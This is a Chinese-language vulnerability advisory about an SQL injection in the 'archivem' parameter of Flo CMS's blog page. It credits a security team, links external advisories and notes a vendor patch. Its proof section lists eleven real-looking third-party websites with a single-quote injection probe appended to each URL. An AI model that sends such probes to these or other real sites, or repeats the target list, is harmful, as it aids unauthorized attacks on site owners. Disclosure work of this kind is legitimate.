Flo CMS “archivem” SQL注入漏洞


发布日期:2013-09-05
更新日期:2013-09-08

受影响系统:
Flo CMS Flo CMS
描述:
--------------------------------------------------------------------------------
Flo CMS是内容管理系统。

Flo CMS没有正确过滤/blog/index.asp的"archivem" GET参数,远程攻击者通过注入任意SQL代码,即可利用此漏洞操作SQL查询。

<*来源:Ashiyane Digital Security Team
 
  链接:http://secunia.com/advisories/54678/
        http://packetstormsecurity.com/files/123058/Flo-CMS-SQL-Injection.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# [+] Exploit :
#
# [+] Location : [Target]/blog/index.asp?archivem=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kellschamber.ie/blog/index.asp?archivem='
#
# http://www.locumotion.com/blog/index.asp?archivem='
#
# http://www.tamhnach.org/blog/index.asp?archivem='
#
# http://www.royaltaragolfclub.com/blog/index.asp?archivem='
#
# http://www.thebective.ie/blog/index.asp?archivem='
#
# http://www.slanefarmhostel.ie/blog/index.asp?archivem='
#
# http://www.sandbar.ie/blog/index.asp?archivem='
#
# http://www.recruitmentbureau.com/blog/index.asp?archivem='
#
# http://www.joecurrancommercials.com/blog/index.asp?archivem='
#
# http://www.littonlanetraining.com/blog/index.asp?archivem='
#
# http://www.kentstownmontessori.com//blog/index.asp?archivem='

建议:
--------------------------------------------------------------------------------
厂商补丁:

Flo CMS
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.flocms.ie

相关内容

    暂无相关文章